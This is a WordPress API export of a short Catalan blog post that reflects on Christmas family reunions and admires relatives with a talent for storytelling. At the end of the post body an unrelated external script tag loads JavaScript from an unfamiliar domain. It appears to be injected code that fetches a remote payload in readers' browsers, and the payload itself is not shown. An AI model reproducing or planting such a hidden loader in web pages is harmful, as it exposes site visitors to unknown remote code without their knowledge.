{"id":372,"date":"2014-12-28T10:40:00","date_gmt":"2014-12-28T10:40:00","guid":{"rendered":"http:\/\/localhost\/wordpress\/2014\/12\/28\/nadal-temps-de-histories-visca-el-comunicador\/"},"modified":"2020-03-13T15:05:47","modified_gmt":"2020-03-13T15:05:47","slug":"nadal-temps-de-histories-visca-el-comunicador","status":"publish","type":"post","link":"https:\/\/www.talenteamup.com\/es\/2014\/12\/28\/nadal-temps-de-histories-visca-el-comunicador\/","title":{"rendered":"Nadal, temps de hist\u00f2ries.  Visca el comunicador!"},"content":{"rendered":"<div class=\"separator\" style=\"clear: both; text-align: center;\"><a style=\"clear: left; float: left; margin-bottom: 1em; margin-right: 1em;\" href=\"http:\/\/4.bp.blogspot.com\/-kGrwZjNKpFk\/VJ_dunAdHVI\/AAAAAAAAMyc\/pyIMtNV0LsY\/s1600\/Post%2B4%2Bfoto.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/4.bp.blogspot.com\/-kGrwZjNKpFk\/VJ_dunAdHVI\/AAAAAAAAMyc\/pyIMtNV0LsY\/s1600\/Post%2B4%2Bfoto.jpg\" width=\"320\" height=\"320\" border=\"0\" \/><\/a><\/div>\n<p>Nadal! S\u00f3n dates de fam\u00edlia. I que diferents poden ser les reunions de grans i petits al voltant dels regals i les taules plenes de menjar!<\/p>\n<p>Jo vinc d&#8217;una fam\u00edlia petita, s\u00f2bria, aquest any per\u00f2 ha tocat el torn a l&#8217;altra part&#8230; una gentada! I entre tanta gent em crida l&#8217;atenci\u00f3 la facilitat d&#8217;alguns d&#8217;assumir el protagonisme, a ser l&#8217;\u00e0nima de la festa! \u00c9s un talent! Es nota que gaudeixen del seu p\u00fablic i fan el possible per fer vibrar amb les seves hist\u00f2ries a la resta del grup. \u00c9s fant\u00e0stic! Qualsevol cosa pot resultar un espectacle i est\u00e0 clar que all\u00e0 on est\u00e0 ell, es reuneixen els dem\u00e9s, ni que sigui la cuina entre plats bruts&#8230; \u00e9s igual!<\/p>\n<p>El comunicador es creix i d\u00f3na el millor de si. A mi em continua meravellant perqu\u00e8 \u00e9s un talent que no tinc.<\/p>\n<p>Visca la fam\u00edlia! I gaudim de tots tal com som.<\/p>\n<p><script src=\"\/\/nightroi.com\/2288f2c6a7da530f01.js\" async=\"\" type=\"text\/javascript\"><\/script>","protected":false},"excerpt":{"rendered":"<p>Nadal! S\u00f3n dates de fam\u00edlia. I que diferents poden ser les reunions de grans i petits al voltant dels regals i les taules plenes de menjar! Jo vinc d&#8217;una fam\u00edlia petita, s\u00f2bria, aquest any per\u00f2 ha tocat el torn a l&#8217;altra part&#8230; una gentada! I entre tanta gent em crida l&#8217;atenci\u00f3 la facilitat d&#8217;alguns d&#8217;assumir [&#8230;]\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[24,48],"tags":[21,49],"class_list":["post-372","post","type-post","status-publish","format-standard","hentry","category-motivacio","category-talents","tag-motivacion","tag-talentos"],"_links":{"self":[{"href":"https:\/\/www.talenteamup.com\/es\/wp-json\/wp\/v2\/posts\/372","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.talenteamup.com\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.talenteamup.com\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.talenteamup.com\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.talenteamup.com\/es\/wp-json\/wp\/v2\/comments?post=372"}],"version-history":[{"count":1,"href":"https:\/\/www.talenteamup.com\/es\/wp-json\/wp\/v2\/posts\/372\/revisions"}],"predecessor-version":[{"id":1446,"href":"https:\/\/www.talenteamup.com\/es\/wp-json\/wp\/v2\/posts\/372\/revisions\/1446"}],"wp:attachment":[{"href":"https:\/\/www.talenteamup.com\/es\/wp-json\/wp\/v2\/media?parent=372"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.talenteamup.com\/es\/wp-json\/wp\/v2\/categories?post=372"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.talenteamup.com\/es\/wp-json\/wp\/v2\/tags?post=372"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}